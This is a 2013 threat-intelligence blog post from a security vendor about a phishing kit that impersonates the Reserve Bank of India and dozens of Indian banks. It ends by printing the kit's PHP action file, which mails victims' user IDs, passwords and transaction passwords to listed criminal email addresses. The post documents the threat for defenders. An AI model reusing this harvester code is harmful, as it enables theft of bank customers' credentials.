Friday, December 13, 2013

Indian Banks targeted in multi-brand Phishing Attack

Malcovery Security's PhishIQ portal is a fascinating place to explore. This week I did a "Security Year in Review" webinar for an audience of our customers and friends which was so much fun to prepare! (We recorded the webinar for those who missed it - you can watch the recording here: State of Cybersecurity 2013/2014. We reviewed the top security events of 2013, including some of the biggest hacks, the most prominent malware trends, and the successes that our security community - researchers, security companies, and law enforcement - had in responding to these challenges. I also shared my Ten Security Predictions for 2014. I've posted those to the LinkedIn group Enterprise Security Intelligence & Big Data and would love to hear your thoughts on them. Please consider joining our group and the conversation!

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Although most phishing victims continue to be in the United States at the present time, the reason for this is the widespread availability of high-speed Internet and the prominence of Online Banking. As China and India, who between them represent 36.5% of the world population, increasingly embrace online banking the criminals of the world will turn their eyes to this population who is now banking online, but who does not have decades of experience with Internet Safety issues leading up to them. I've already received some questions about this prediction, so I thought I would share some feedback on this one by showing some of the visibility we have in PhishIQ to the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a phishing campaign imitating the Reserve Bank of India. In this phishing attack, the spammers have indicated that you need to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including for example a live version today on "thedelamere.co.uk".

For each of the icons on the list below, a full corresponding phishing site is offered. For some reason, the "western" banks on the list do NOT go to a phishing site, but provide a link directly to the brand indicated, These "non-phish" (mostly western banks, but some Indian as well) would include Barclays, Citibank, Deutsche Bank, Karnataka Bank, Karur Vysya Bank, Lakshmi Vilas Bank, RBS, Standard Charter, and Tamilnad Mercantile Bank.

(Screen shot of phish on "thedelamere.co.uk")

The same set of phishing files is regularly occurring in our Phishing intelligence system with more than 80 websites having been hacked to host these files.

Because Malcovery is REALLY good at recovering phishing kits, we were able to recover the criminals' email addresses in 15 of the 80 websites. akachi16akachi16@sify.com, akachiugonna@rediffmail.com, and akachiugonna@sify.com were found in 11 of those 15.

In November, the "action file" of these phish sent email to four email addresses, as shown above, and as observed by the investigators at e-Police.in. More recently, the "chizobamyluck@gmail.com" address has been excluded from the kit.

For example, for the phishing site:

The action file was:

<$fromemail = "$ip";
$ip = getenv("REMOTE_ADDR");
$message  = "-----------------+ Andhra Bank Details +-----------------\n";
$message .= "User Id: " .$_POST['user']."\n";
$message .= "Password: " .$_POST['pass1']."\n";
$message .= "Transaction Password: " .$_POST['pass2']."\n";
$message .= "Mobile: " .$_POST['mobile']."\n";
$message .= "Client IP      : $ip\n";
$message .= "-----------------+ Created in 2012 By DON PERO------------------\n";

$recipient = "akachi16akachi16@sify.com, akachiugonna@rediffmail.com, 
akachiugonna@sify.com, chizobamyluck@gmail.com";
$subject = "Andhra $ip";
$headers = "From: admin@gameshack.org";
$headers .= $fromemail."\n";
$headers .= "MIME-Version: 1.0\n";

if (mail($recipient,$subject,$message,$headers)) 
   {     header("Location: http://andhrabank.com");    }else    

    {   echo "ERROR! Please go back and try again.";      }>